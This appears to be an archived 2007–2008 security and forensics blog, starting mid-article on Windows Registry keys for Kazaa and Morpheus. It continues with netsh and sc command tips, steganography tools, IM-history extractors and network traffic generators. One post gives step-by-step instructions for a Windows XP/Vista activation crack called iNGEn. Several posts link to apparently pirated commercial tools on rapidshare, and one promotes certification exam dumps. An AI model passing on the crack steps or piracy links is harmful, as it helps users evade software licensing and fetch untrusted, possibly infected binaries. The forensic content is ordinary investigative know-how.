Kazaa, however, was a bit more successful. Two Registry keys of interest were discovered. The first was HKCU\Software\Kazaa, and contained many user settings that could be useful to an investigator. For instance, beneath the Kazaa key there is a subkey called ResultsFilter, which shows the value for the “adult_filter_level”. This setting will filter adult content from search results. If the value of the adult_filter_level is (1) it is enabled and if it is (0) it is disabled. By default Kazaa enables the adult filter, so if this setting is disabled then it’s a good indication the user has taken the initiative to do so within the Kazaa options menu. Figure 9 shows the location of this key and the information in which it contains.

The other Kazaa Registry key that is worth pointing out is HKLM\Software\ Kazaa. This key contains subkeys that hold connection information and the destination directory of the downloaded files, which show that a default installation of Kazaa stores downloaded files to C:\Program Files\Kazaa\My Shared Folder.

Morpheus:

Of the three P2P clients that were researched, Morpheus was the only one that kept a log in the Registry of recently searched for keywords or phrases. The location of this key is HKCU\Software\Morpheus\GUI\SearchRecent and can be seen in Figure 10.

If an examiner is investigating a case where the user is suspected to have used Morpheus to download illegal content, this key could be very useful in seeing exactly the type of material the user was querying.

One Thing in Common:

Research of these three P2P clients revealed one Registry key that they all had in common:

HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

This is a list of applications that are allowed “outside access” by the Windows Firewall that was implicated in SP2. If the P2P programs are not included in this list then they wouldn’t be assigned a TCP or UDP port to access the P2P client’s server and would consequently be blocked. Therefore, any type of program in use for file sharing purposes should appear on this list. This would be a great place for a forensic examiner to look in determining if the system has other potential file sharing applications that have been overlooked.

Overview:

The following list includes a brief recap of the Registry keys discussed on this page.

o HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

o HCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist

o HKLM\SOFTWARE\ Microsoft\WZCSVC\Parameters\Interfaces

o HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\

o HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions

o HKLM\SYSTEM\ControlSet00x\Enum\USBSTOR

o HKLM\SYSTEM\MountedDevices

o HKCU\Software\Microsoft\Internet Explorer\Main

o HKCU\Software\Microsoft\Internet Explorer\TypedURLs

o HKCU\Software\Microsoft\Internet Explorer\Download Directory

o HKCU\Software\Kazaa

o HKCU\Software\Morpheus\GUI\SearchRecent

o HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

For a comprehensive list of Registry keys that directly relate to a computer forensic examination, many of which were not discussed in this paper, refer to AccessData’s PDF document Registry Quick Find Chart.

http://www.accessdata.com/media/en_US/print/papers/wp.Registry_Quick_Find_Chart.en_us.pdf

windows command line tools

2008-01-15T21:16:00.000-08:00

A good tutorial which i found on the net

Setting a static IP:
netsh interface ip set address name="Local Area Connection" static 172.16.3.4 255.255.0.0 1172.16.3.1 1

Setting up DNS:
set dns name="Local Area Connection" static 208.67.222.222 register=PRIMARY
add dns name="Local Area Connection" 208.67.200.200

Checking your config:
netsh interface ip show config

Saving all of your settings to a file:
netsh -c interface dump > filename1.txt

Using a file to set the config (I don't know why there are two ways to do this):
netsh -f filename2.txt
netsh exec filename2.txt

Setting up DHCP:
netsh interface ip set address name="Local Area Connection" dhcp
Then use ipconfig /release and ipconfig /renew

Stopping a service:
sc stop SNMP

Disabling a service
sc config SNMP start= disabled

remotely open files from your computer
net file

List all sessions connected to this machine
NET SESSION
NET SESSION \\ComputerName
NET SESSION /DELETE /y
NET SESSION \\ComputerName /DELETE

hostname
getmac

to shutdown a remote computer
shutdown -i
to cancel a scheduled shutdown
shutdown -a

The Coroner's Toolkit (TCT)

2007-12-26T04:08:00.001-08:00

TCT is a collection of programs that can be used for a post-mortem analysis of a UNIX system after break-in. The software was presented first during a free Computer Forensics Analysis class that we gave one year ago (almost to the day).

Notable TCT components are the grave-robber tool that captures information, the ils and mactime tools that display access patterns of files dead or alive, the unrm and lazarus tools that recover deleted files, and the keyfind tool that recovers cryptographic keys from a running process or from files.

http://www.porcupine.org/forensics/tct.html

The Forensic ToolKit

2007-12-26T04:07:00.001-08:00

The Forensic ToolKit contains several Win32 Command line tools that help you examine the files on a NTFS disk partition for unauthorized activity. This tool is a file properties analyzer. It performs numerous functions such as examine the files on a disk drive for unauthorized activity, lists files by their last access time, search for access times between certain time frames, scan the disk for hidden files and data streams. The Forensic toolkit will also dump file and security attributes, report on audited files, discover altered ACL's and see if a server reveals too much info via NULL sessions.

http://www.foundstone.com/knowledge/free_tools.html

DMZS-FIRE

2007-12-26T04:05:00.001-08:00

FIRE, the Forensic and Incident Response Environment, (formerly known as Biatchux) is a portable, bootable CD-ROM-based distribution providing an immediate environment for performing forensics analysis, data recovery, virus scanning, and pen-testing. It also provides the necessary tools for live forensics/analysis/incident response.

http://biatchux.sourceforge.net

Autopsy Forensic Browser

2007-12-26T03:59:00.000-08:00

The Autopsy Forensic Browser is an HTML-based graphical interface to The @stake Sleuth Kit (TASK). Together, TASK and Autopsy Forensic Browser are an open source alternative to the common Windows-based digital forensic tools. Autopsy provides an investigator with an HTML-based graphical interface that allows one to browse images from compromised systems in a "File Manager"-like interface. Windows and UNIX file systems can be analyzed to view deleted files, create time lines of file activity, and perform key word searches.
http://www.atstake.com/research/tools/autopsy/

Webtracer

2007-12-26T03:56:00.000-08:00

The Webtracer is a professional forensic tool to trace internet identities such as a website owners, the sender of an e-mail etc.

Each internet resource (IP address, server name, e-mail address, URL etc.) can be investigated to retrieve underlying relations and owner details.

The Webtracer also allows in depth analysis of e-mail headers and can be used to analyse logfiles after a possible intrusion.

http://www.forensictracer.com

Log 2 Google Earth

2007-12-26T03:55:00.000-08:00

Visualize any logfile (firewall / apache you name it) in near realtime on Google Earth. See where you traffic is coming and going to.

http://www.bytesman.com/

FTester (Firewall Testing)

2007-12-26T03:46:00.000-08:00

FTester (firewall tester) is a tool designed for testing firewalls' filtering policies. It includes an Intrusion Detection System testing feature, along with a packet generator tool and a sniffer. Unlike common firewall testing tools or packet generators, ftester is capable of generating network traffic that will look like real connections to the firewall or IDS system tested, which allows users to test stateful inspection firewalls (like netfilter or ipfilter) and IDS (like snort).

http://dev.inversepath.com/trac/ftester

Belkasoft Forensic IM Extractor

2007-12-26T03:41:00.000-08:00

This tool for e-crime/forensic professionals eases their work on analysing Internet Messengers histories. No password required. Supports various IMs: ICQ versions 99a up to ICQ5, MSN Messenger, Yahoo! Messenger, &RQ, Miranda. Supports deep ICQ analysis using different methods (with and without usage of index file) that allows user to extract even deleted and overwritten messages. The latter ability is indispensable for e-crime professionals. A number of different options available like filtering messages by time, sent/received type, user; ability to convert history to ICQ5 format; multibyte codepages are supported.

http://belkasoft.com/download/bfie301.zip

Simp pro 2.2.11

2007-12-08T22:28:00.000-08:00

You use instant messengers to chat with your friends or colleagues. Did you know that your messages are sent in cleartext over the Internet, regardless of their destination?

SimpPro secures popular instant messengers (MSN Messenger, Yahoo! Messenger, ICQ, AIM, Jabber, Google Talk ) by encrypting text messages and file transfers. SimpPro is the commercial version of SimpLite, currently used by more than 50,000 security-aware IM users worldwide.

Main SimpPro features:
Encrypts IM text messages before they leave your computer
Protects MSN Messenger and ICQ/AIM file transfers
Personal, small business and corporate use
Full compatibility with popular IM networks, clients and with SimpLite

WEB CACHE Illuminator

2007-12-08T22:26:00.000-08:00

Easily investigate all the web pages and images that someone has viewed. This program will succinctly show the web page title, date/time it was viewed, and thumbnails of all the images. As an added convenience, it can search the computer and locate all of the cache folders for you. Other features include ...

WORKS WITH ANY WEB BROWSER
The presentation is shown in a browser so that you can click on any title or images and then actually see first-hand what any of the pages look like. It also features the ability to filter images and/or other binary files.

RETRIEVE "HIDDEN" INFORMATION YOU'RE NOT SUPPOSED TO FIND
The Web Cache Illuminator will enhance any investigation of online activity because, in an attempt to hide their activity, people often delete their browser's history list -- but they will forget (or do not know how) to delete the browser's cached files. With the Web Cache Illuminator, you can look at those cached files and shed considerable light onto their contents.

A BUILT-IN VIEW/DELETE WIZARD
Use its handy View/Delete Wizard to delete an entire cache folder, or only selected files.
http://rapidshare.com/files/53930165/Web.Cache.Illuminator.v5.2.0.rar

mst TotalAccess Disk - get full access!

2007-12-08T22:23:00.000-08:00

Are you familar with the problem, that you, administrator, are not granted access to some files and folders? If you use mst TotalAccess Disk, you will never again be bothered by "Acces denied" messages.

mst TotalAcces Disk grants you access to all data on a storage volume. It does not even matter whether it is a hard disk or any other device - mst TotalAccess Disk integrates with the operating system.

Sometimes, administrators have to take a look in folders like "System Volume Information" or personal folders of other users. Normally, to be able to do this, the security of this object has to be modified, sometimes it is even required to take over ownership. But not with mst TotalAccess Disk! Just run it and get total access!

http://rapidshare.com/files/53930594/TotalAccess_Disk_PRO_1.0.8.166.rar

Anti Hacker Expert

2007-12-08T22:09:00.000-08:00

Anti-Hacker Expert Trojan can scan and kill hacker program and trojans.Actually Anti-Hacker Expert includes more than 12000 hacker program and trojan signatures.Use manifold scan,fast and reliable detects your computer. Use the portscan to find open ports for hacker and trojan on your PC,and delete hacker program andtrojan. The registry-scan is highspeed scan for autorun-entries. It scans the system registry by using known trojan filenames. If a trojan is identified by the registry-scan, it will be removed from disk.The memory scan is scan all system process,if found hacker program and trojan,in a minute kill it and delete interrelated file. The diskscan also removes unwanted hacker program and trojan files from your harddisks. This is the most important search method. You can select wheter you want to scan whole drives or specified folders. The Firewall can background-guard watches for active hacker program and trojans while you are working on your PC. We time publish new edition to scan more hacker program and trojan,with Internet Online update to get new edition

http://rapidshare.com/files/57122412/Anti_Hacker_Expert_2007.rar

Axence nVision Professional 3.1.0.2083

2007-12-08T22:06:00.000-08:00

nVision monitors your network: Windows, TCP/IP services, web and mail servers, URLs, applications (MS Exchange, SQL etc.). It also monitors routers and switches: network traffic, interface status, connected computers. You can collect network inventory and audit license usage. nVision will also alert you in case of a program installation or any configuration change. With the agent you can monitor user activity and access computers remotely.

http://rapidshare.com/files/57852141/Axence_nVision_Professional_3.1.0.2083.rar

STEGANOGRAPHY (Hiding Information) Tools

2007-11-23T04:39:00.000-08:00

EXCELLENT COMPILE LIST OF STEGANOGRAPHY TOOLS PUT TOGETHER BY DR. NEIL F. JOHNSON

http://www.jjtc.com/Steganography/toolmatrix.htm

STEGALYZERSS (COMMERCIAL)

http://www.sarc-wv.com/stegalyzerss.aspx

THE STEGANOGRAPHY ANALYZER SIGNATURE SCANNER (STEGALYZERSS) IS A DIGITAL FORENSIC ANALYSIS TOOL DESIGNED TO EXTEND THE SCOPE OF TRADITIONAL DIGITAL FORENSIC EXAMINATIONS BY ALLOWING THE EXAMINER TO SCAN FILES ON SUSPECT MEDIA, OR FORENSIC IMAGES OF SUSPECT MEDIA, FOR UNIQUE HEXADECIMAL BYTE PATTERNS, OR KNOWN SIGNATURES, LEFT INSIDE FILES WHEN PARTICULAR STEGANOGRAPHY APPLICATIONS ARE USED TO EMBED HIDDEN INFORMATION WITHIN THEM.
STEGALYZERSS EXTENDS THE SIGNATURE SCANNING CAPABILITY BY ALSO ALLOWING THE EXAMINER TO USE OTHER TECHNIQUES FOR DETECTING WHETHER INFORMATION MAY HAVE BEEN APPENDED TO, OR HIDDEN WITHIN, POTENTIAL CARRIER FILES. STEGALYZERSS HAS BEEN FOUND TO BE EFFECTIVE IN IDENTIFYING FILES THAT CONTAIN HIDDEN STEGANOGRAPHIC DATA BY THE DEFENSE CYBER CRIME INSTITUTE (DCCI) AND THE CYBERSCIENCE LABORATORY (CSL).

PRODUCT HIGHLIGHTS IN STEGALYZERSS:

CASE GENERATION AND MANAGEMENT
CAPABILITY TO MOUNT AND SCAN FORENSIC IMAGES OF STORAGE MEDIA IN ENCASE, RAW (DD), OR SMART FORMATS
AUTOMATED SCANNING OF AN ENTIRE FILE SYSTEM, INDIVIDUAL DIRECTORIES, OR INDIVIDUAL FILES ON SUSPECT MEDIA FOR THE PRESENCE OF KNOWN SIGNATURES OF PARTICULAR STEGANOGRAPHY APPLICATIONS
IDENTIFY FILES THAT HAVE INFORMATION APPENDED BEYOND THE FILE'S END-OF-FILE MARKER WITH THE APPEND ANALYSIS FEATURE AND ANALYZE THE FILES IN A HEX EDITOR VIEW TO DETERMINE THE NATURE OF THE HIDDEN INFORMATION
IDENTIFY FILES THAT HAVE INFORMATION EMBEDDED USING LEAST SIGNIFICANT BIT (LSB) IMAGE ENCODING WITH THE LSB ANALYSIS FEATURE AND EXTRACT AND REARRANGE THE LSBS FOR ANALYSIS IN A HEX EDITOR VIEW TO DETERMINE IF INFORMATION HAS BEEN HIDDEN WITHIN THE FILE
EXCLUSIVE AUTOMATED EXTRACTION ALGORITHM FUNCTIONALITY FOR SELECTED STEGANOGRAPHY APPLICATIONS GIVES EXAMINERS A "POINT-CLICK-AND-EXTRACT" INTERFACE TO EASILY EXTRACT HIDDEN INFORMATION FROM SUSPECT FILES
EXTENSIVE REPORT GENERATION IN HTML FORMAT
AUTOMATED LOGGING OF KEY EVENTS AND INFORMATION OF POTENTIAL EVIDENTIARY VALUE
EXPORT SESSION ACTIVITY AND EVIDENCE LOGS IN COMMA SEPARATED VALUE (.CSV) FORMAT
INTEGRATED HELP FEATURE TO EXPLAIN SPECIFIC FEATURES AND FUNCTIONS

STEGDETECT

http://www.outguess.org/download.php

STEGDETECT IS AN AUTOMATED TOOL FOR DETECTING STEGANOGRAPHIC CONTENT IN IMAGES. IT IS CAPABLE OF DETECTING SEVERAL DIFFERENT STEGANOGRAPHIC METHODS TO EMBED HIDDEN INFORMATION IN JPEG IMAGES.
CURRENTLY, THE DETECTABLE SCHEMES ARE:

JSTEG,
JPHIDE (UNIX AND WINDOWS),
INVISIBLE SECRETS,
OUTGUESS 01.3B,
F5 (HEADER ANALYSIS),
APPENDX AND CAMOUFLAGE.

STEGBREAK IS USED TO LAUNCH DICTIONARY ATTACKS AGAINST JSTEG-SHELL, JPHIDE AND OUTGUESS 0.13B.

STEGHIDE

http://steghide.sourceforge.net/

STEGHIDE IS A STEGANOGRAPHY PROGRAM THAT IS ABLE TO HIDE DATA IN VARIOUS KINDS OF IMAGE- AND AUDIO-FILES. THE COLOR- RESPECTIVELY SAMPLE-FREQUENCIES ARE NOT CHANGED THUS MAKING THE EMBEDDING RESISTANT AGAINST FIRST-ORDER STATISTICAL TESTS.

OUTGUESS

http://www.outguess.org/

OUTGUESS IS A UNIVERSAL STEGANOGRAPHIC TOOL THAT ALLOWS THE INSERTION OF HIDDEN INFORMATION INTO THE REDUNDANT BITS OF DATA SOURCES. THE NATURE OF THE DATA SOURCE IS IRRELEVANT TO THE CORE OF OUTGUESS. THE PROGRAM RELIES ON DATA SPECIFIC HANDLERS THAT WILL EXTRACT REDUNDANT BITS AND WRITE THEM BACK AFTER MODIFICATION. IN THIS VERSION THE PNM AND JPEG IMAGE FORMATS ARE SUPPORTED. IN THE NEXT PARAGRAPHS, IMAGES WILL BE USED AS CONCRETE EXAMPLE OF DATA OBJECTS, THOUGH OUTGUESS CAN USE ANY KIND OF DATA, AS LONG AS A HANDLER IS PROVIDED.

Exam Dumps

2007-11-22T22:20:00.000-08:00

Visit this link for exam dumps
http://certificationking.net/

FootPrinting / Information Gathering

2007-11-22T22:10:00.000-08:00

FREE, FAST, ADVANCED AND COMPREHENSIVE WEB-BASED DNS AND DOMAIN NAME TOOLS

http://member.dnsstuff.com/pages/tools.php

FORENSIC ISP CONTACT LIST

http://www.search.org/programs/hightech/isp/

GEOBYTES SPAMLOCATER

http://www.geobytes.com/SpamLocator.htm

THIS SPAMMER'S ORIGIN LOCATOR SERVICE IS PROVIDED FOR FREE BY GEOBYTES TO ASSIST YOU IN LOCATING THE GEOGRAPHICAL LOCATION THAT AN EMAIL ORIGINATED FROM.

(YOU CAN ALSO USE IT TO DETERMINE THE GEOGRAPHIC LOCATION OF SENDERS OF LEGITIMATE EMAIL AS WELL.)

GEOBYTES IPLOCATER

http://www.geobytes.com/IpLocator.htm

THIS IP ADDRESS MAP LOOKUP SERVICE IS PROVIDED FOR FREE BY GEOBYTES

GEOBYTES TRACEROUTELOCATER

http://www.geobytes.com/TraceRouteLocator.htm

THIS TRACE ROUTE LOCATION SERVICE IS PROVIDED FOR FREE BY GEOBYTES TO ASSIST YOU IN LOCATING THE GEOGRAPHICAL LOCATION OF IP ADDRESSES

BULK IP ADDRESS LOCATOR (LIMIT 50 AT A TIME)

http://www.ipligence.com/iplocation/

IPNETINFO

http://www.nirsoft.net/utils/ipnetinfo.html

IPNETINFO IS A SMALL UTILITY THAT ALLOWS YOU TO EASILY FIND ALL AVAILABLE INFORMATION ABOUT AN IP ADDRESS: THE OWNER OF THE IP ADDRESS, THE COUNTRY/STATE NAME, IP ADDRESSES RANGE, CONTACT INFORMATION (ADDRESS, PHONE, FAX, AND EMAIL), AND MORE. THIS UTILITY CAN BE VERY USEFUL FOR FINDING THE ORIGIN OF UNSOLICITED MAIL. YOU CAN SIMPLY COPY THE MESSAGE HEADERS FROM YOUR EMAIL SOFTWARE AND PASTE THEM INTO IPNETINFO UTILITY. IPNETINFO AUTOMATICALLY EXTRACTS ALL IP ADDRESSES FROM THE MESSAGE HEADERS, AND DISPLAYS THE INFORMATION ABOUT THESE IP ADDRESSES.

Make Your Windows Genuine -For XP,Server 03, Vista FULL

2007-11-22T22:04:00.000-08:00

Download

Make Your Windows Genuine - For XP,Server 2003, Vista
--------------------------------------------------------------

For Windows XP Professional/Server 2003
Go to "WINDOWS XP and Server 2003" Folder

For Windows VISTA All Versions
Go to "Windows Vista All Versions x86 x64" Folder

-------------------------------------------------------------
Make Your Windows Genuine - For XP,Server 2003, Vista - iNGEn
-------------------------------------------------------------

DO SHARE THIS STUFF IF YOU FIND IT HELPFUL...

Use any one ....

--------------------
1) iNGEN_WinDoWs.exe - Requires .NET Framework 2.0
-------------------- (can be downloaded from microsoft's dnld site)

Works for windows xp, xp-sp2 and windows server 2003

1)Select the product.

Win Xp Pro : Windows XP PRO
Win Xp Pro SP2 : Windows XP PRO VLK
Windows Server 2003 : Windows Server 2003 VLK

2)Enter any number less than 4500 for Win Xp Pro SP2,
less than 1500 for Win Xp Pro,
less than 1500 for Windows Server 2003.

3)Press the genuinise button.

That's it.

You can now go to the microsoft update or download site, install
the wga active X as told and download anything.

NOTE: This program can also be used to change the product key.
Instead of using the keys in the database, you can also
type in your product key, if it is valid, it will
update the key of the system.

IF iNGEN_WinDoWs.exe does not run make sure that you have
Microsoft .NET Framework installed.

Download Link for Microsoft .NET Framework:
http://www.microsoft.com/downloads/details.aspx?FamilyID=0856EACB-4362-4B0D-8EDD-AAB15C5E04F5&displaylang=en

------------------
2) iNGEn_XPsp2.exe
------------------

Uses the same method as of iNGEN_WinDoWs.exe but only works for
Windows XP SP2.

It does not has any dependencies.

-----------------------
3) iNGEn_XPsp2_v2.1.exe
-----------------------

Updated Version of "iNGEn_XPsp2.exe"

--------------------------------------------------------------------

- Also Contains Stuff to Check Validation state and Generate Keys.

- Working Cracks for all versions of windows vista also.

- Contains Screenshots Of To help you.

EMLATORS & TRAFFIC GENERATOR / DoS Attack Tools

2007-11-22T22:00:00.001-08:00

WEBLOAD

http://www.webload.org/overview.html

WEBLOAD PROVIDES A COMPREHENSIVE AND ROBUST ENVIRONMENT FOR LOAD TESTING. THIS INCLUDES A FULL AUTHORING ENVIRONMENT FOR RECORDING, EDITING AND DEBUGGING TEST SCRIPTS, A HIGHLY EFFICIENT EXECUTION ENVIRONMENT FOR DEFINING LOAD PARAMETERS (VIRTUAL USERS), RUNNING AND MONITORING THE TESTS AS WELL AS REPORTING TOOLS FOR ANALYZING AND PRESENTING TEST RESULTS.

CURL-LOADER

http://sourceforge.net/projects/curl-loader

A POWERFUL C-WRITTEN WEB APPLICATION TESTING AND LOAD GENERATING TOOL. IT USES HTTP, FTP AND TLS/SSL STACKS, SIMULATING TENS OF THOUSAND USERS / CLIENTS EACH WITH OWN IP-ADDRESS. THE GOAL IS TO PROVIDE AN ALTERNATIVE TO SPIRENT AVALANCHE AND IXIA IXLOAD

SEAGULL

http://gull.sourceforge.net/index.html

SEAGULL IS A FREE, OPEN SOURCE (GPL) MULTI-PROTOCOL TRAFFIC GENERATOR TEST TOOL. PRIMARILY AIMED AT IMS (3GPP, TISPAN, CABLELABS) PROTOCOLS (AND THUS BEING THE PERFECT COMPLEMENT TO SIPP FOR IMS TESTING), SEAGULL IS A POWERFUL TRAFFIC GENERATOR FOR FUNCTIONAL, LOAD, ENDURANCE, STRESS AND PERFORMANCE/BENCHMARK TESTS FOR ALMOST ANY KIND OF PROTOCOL. IN ADDITION, ITS OPENNESS ALLOWS TO ADD THE SUPPORT OF A BRAND NEW PROTOCOL IN LESS THAN 2 HOURS - WITH NO PROGRAMMING KNOWLEDGE. FOR THAT, SEAGULL COMES WITH SEVERAL PROTOCOL FAMILIES EMBEDDED IN THE SOURCE CODE:

BINARY/TLV (DIAMETER, RADIUS AND MANY 3GPP AND IETF PROTOCOLS)
EXTERNAL LIBRARY (TCAP, SCTP)
TEXT (XCAP, HTTP, H248 ASCII)

NETWORK SIMULATOR - NS-2

http://nsnam.isi.edu/nsnam/index.php/User_Information

NS IS A DISCRETE EVENT SIMULATOR TARGETED AT NETWORKING RESEARCH. NS PROVIDES SUBSTANTIAL SUPPORT FOR SIMULATION OF TCP, ROUTING, AND MULTICAST PROTOCOLS OVER WIRED AND WIRELESS (LOCAL AND SATELLITE) NETWORKS.

WANULATOR

http://www.wanulator.de/Home.html

WANULATOR COMBINES "WAN" AND "SIMULATOR. THIS PRETTY MUCH ALREADY DESCRIBES WHAT THE SOFTWARE DOES: IT SIMULATES DIFFERENT INTERNET CONDITIONS SUCH AS DELAY OR PACKET LOSS. FURTHERMORE IT SIMULATES USER ACCESS SPEEDS E.G. MODEM, ISDN OR ADSL

HARPOON

http://wail.cs.wisc.edu/waildownload.py

HARPOON IS A FLOW-LEVEL TRAFFIC GENERATOR. IT USES A SET OF DISTRIBUTIONAL PARAMETERS THAT CAN BE AUTOMATICALLY EXTRACTED FROM NETFLOW TRACES TO GENERATE FLOWS THAT EXHIBIT THE SAME STATISTICAL QUALITIES PRESENT IN MEASURED INTERNET TRACES, INCLUDING TEMPORAL AND SPATIAL CHARACTERISTICS. HARPOON CAN BE USED TO GENERATE REPRESENTATIVE BACKGROUND TRAFFIC FOR APPLICATION OR PROTOCOL TESTING, OR FOR TESTING NETWORK SWITCHING HARDWARE.

NETPATH

http://wail.cs.wisc.edu/waildownload.py

NETPATH IS A SCALABLE LINK EMULATION TOOL, WHICH AUTOMATICALLY ASSIGNS PROFILES TO LINKS IN A LABORATORY ENVIRONMENT. IT EMULATES FIXED AND PROBABILISTIC PROPAGATION DELAYS, PROBABILISTIC BIT ERRORS, PROBABILISTIC PACKET LOSS, PROBABILISTIC PACKET REORDERING, PROBABILISTIC PACKET DUPLICATION AND BANDWIDTH SHAPING. THE LINK EMULATION IS ACHIEVED BY INTERPOSING THE NETPATH MACHINE EITHER PHYSICALLY OR VIRTUALLY BETWEEN A PAIR OF HOST MACHINES. NETPATH CAN BE CONFIGURED IN THREE DIFFERENT OPERATIONAL MODES: DIRECT INTERPOSITION (MODE 0), VIRTUAL INTERPOSITION, WHICH MAY EITHER BE BETWEEN ROUTERS (MODE 1) OR END HOSTS (MODE 2), AND A LAYER 3 (IP ROUTED) INTERPOSITION MODE.

MGEN

http://cs.itd.nrl.navy.mil/work/mgen/index.php

THE MULTI-GENERATOR (MGEN) IS OPEN SOURCE SOFTWARE BY THE NAVAL RESEARCH LABORATORY (NRL) PROTOCOL ENGINEERING ADVANCED NETWORKING (PROTEAN) RESEARCH GROUP. MGEN PROVIDES THE ABILITY TO PERFORM IP NETWORK PERFORMANCE TESTS AND MEASUREMENTS USING UDP/IP TRAFFIC (TCP IS CURRENTLY BEING DEVELOPED). THE TOOLSET GENERATES REAL-TIME TRAFFIC PATTERNS SO THAT THE NETWORK CAN BE LOADED IN A VARIETY OF WAYS. THE GENERATED TRAFFIC CAN ALSO BE RECEIVED AND LOGGED FOR ANALYSES. SCRIPT FILES ARE USED TO DRIVE THE GENERATED LOADING PATTERNS OVER THE COURSE OF TIME. THESE SCRIPT FILES CAN BE USED TO EMULATE THE TRAFFIC PATTERNS OF UNICAST AND/OR MULTICAST UDP/IP APPLICATIONS. THE RECEIVE PORTION OF THIS TOOL SET CAN BE SCRIPTED TO DYNAMICALLY JOIN AND LEAVE IP MULTICAST GROUPS. MGEN LOG DATA CAN BE USED TO CALCULATE PERFORMANCE STATISTICS ON THROUGHPUT, PACKET LOSS RATES, COMMUNICATION DELAY, AND MORE. MGEN CURRENTLY RUNS ON VARIOUS UNIX-BASED (INCLUDING MACOS X) AND WIN32 PLATFORMS.

MULTICAST BEACON V1.3

http://dast.nlanr.net/projects/Beacon/

THE NLANR/DAST MULTICAST BEACON IS A MULTICAST DIAGNOSTIC TOOL WRITTEN IN PERL WHICH USES THE RTP PROTOCOL (RFC3550) TO PROVIDE USEFUL STATISTICS AND DIAGNOSTIC INFORMATION ABOUT A GIVEN MULTICAST GROUP'S CONNECTIVITY CHARACTERISTICS.
MULTICAST IS A WAY OF DISTRIBUTING IP PACKETS TO A SET OF MACHINES WHICH HAVE EXPRESSED AN INTEREST IN RECEIVING THEM. IT IS A ONE-TO-MANY DISTRIBUTION MODEL SUITABLE FOR VIDEO CONFERENCING AND OTHER FORMS OF DATA SHARING OVER THE NETWORK.
TEAMED UP WITH THE ACCESS GRID, THE MULTICAST BEACON PROVIDES MEASUREMENT DATA FOR THE CURRENT MULTICAST TRAFFIC IN A GROUP. THE ACCESS GRID IS A PROJECT LED BY ANL TO IMPLEMENT LARGE-SCALE DISTRIBUTED COLLABORATION OVER THE NETWORK. IT RELIES ON MULTICAST FOR DISTRIBUTING AUDIO, VIDEO, AND OTHER DATA ACROSS THE NETWORK.
THE MULTICAST BEACON CAN ALSO BE USED AS A GENERAL-PURPOSE MULTICAST MEASUREMENT TOOL AS WELL.

MHEALTH

http://imj.ucsb.edu/mhealth/

MHEALTH, THE MULTICAST HEALTH MONITOR, IS A GRAPHICAL, NEAR REAL-TIME MULTICAST MONITORING TOOL. BY USING A COMBINATION OF APPLICATION LEVEL PROTOCOL DATA ABOUT GROUP PARTICIPANTS, AND A MULTICAST ROUTE TRACING TOOL FOR TOPOLOGY INFORMATION, MHEALTH IS ABLE TO DISCOVER AND DISPLAY THE FULL NETWORK TREE DISTRIBUTION AND DELIVERY QUALITY. MHEALTH ALSO PROVIDES DATA LOGGING FUNCTIONALITY FOR THE PURPOSE OF ISOLATING AND ANALYZING NETWORK FAULTS. LOGS CAN BE ANALYZED TO PROVIDE INFORMATION SUCH AS RECEIVER LISTS OVER TIME, ROUTE HISTORIES AND CHANGES, AND THE LOCATION, DURATION, AND FREQUENCY OF LOSS.

WANEM

http://wanem.sourceforge.net/

WANEM IS A WIDE AREA NETWORK EMULATOR, MEANT TO PROVIDE A REAL EXPERIENCE OF A WIDE AREA NETWORK/INTERNET, DURING APPLICATION DEVELOPMENT / TESTING OVER A LAN ENVIRONMENT. TYPICALLY APPLICATION DEVELOPERS DEVELOP APPLICATIONS ON A LAN WHILE THE INTENDED PURPOSE FOR THE SAME COULD BE, CLIENTS ACCESSING THE SAME OVER THE WAN OR EVEN THE INTERNET. WANEM THUS ALLOWS THE APPLICATION DEVELOPMENT TEAM TO SETUP A TRANSPARENT APPLICATION GATEWAY WHICH CAN BE USED TO SIMULATE WAN CHARACTERISTICS LIKE NETWORK DELAY, PACKET LOSS, PACKET CORRUPTION, DISCONNECTIONS, PACKET RE-ORDERING, JITTER, ETC. WANEM CAN BE USED TO SIMULATE WIDE AREA NETWORK CONDITIONS FOR DATA/VOICE TRAFFIC AND IS RELEASED UNDER THE WIDELY ACCEPTABLE GPL V2 LICENSE.

WANEM THUS PROVIDES EMULATION OF WIDE AREA NETWORK CHARACTERISTICS AND THUS ALLOWS DATA/VOICE APPLICATIONS TO BE TESTED IN A REALISTIC WAN ENVIRONMENT BEFORE THEY ARE MOVED INTO PRODUCTION AT AN AFFORDABLE COST. WANEM IS BUILT ON TOP OF OTHER FLOSS [FREE LIBRE AND OPENSOURCE] COMPONENTS AND LIKE OTHER INTELLIGENT FLOSS PROJECTS HAS CHOSEN NOT TO RE-INVENT THE WHEEL AS MUCH AS POSSIBLE.

DUMMYNET

http://ai3.asti.dost.gov.ph/sat/dummynet.html
DUMMYNET IS A FLEXIBLE TOOL FOR BANDWIDTH MANAGEMENT AND FOR TESTING NETWORKING PROTOCOLS. IT IS IMPLEMENTED IN FREEBSD BUT IS EASILY PORTABLE TO OTHER PROTOCOL STACKS. THERE IS ALSO A ONE-FLOPPY VERSION OF FREEBSD WHICH INCLUDES DUMMYNET AND A LOT OF OTHER GOODIES, SEE BELOW. IT WORKS BY INTERCEPTING PACKETS IN THEIR WAY THROUGH THE PROTOCOL STACK, AND PASSING THEM THROUGH ONE OR MORE PIPES WHICH SIMULATE THE EFFECTS OF BANDWIDTH LIMITATIONS, PROPAGATION DELAYS, BOUNDED-SIZE QUEUES, PACKET LOSSES, ETC.

MODELNET

http://modelnet.ucsd.edu/

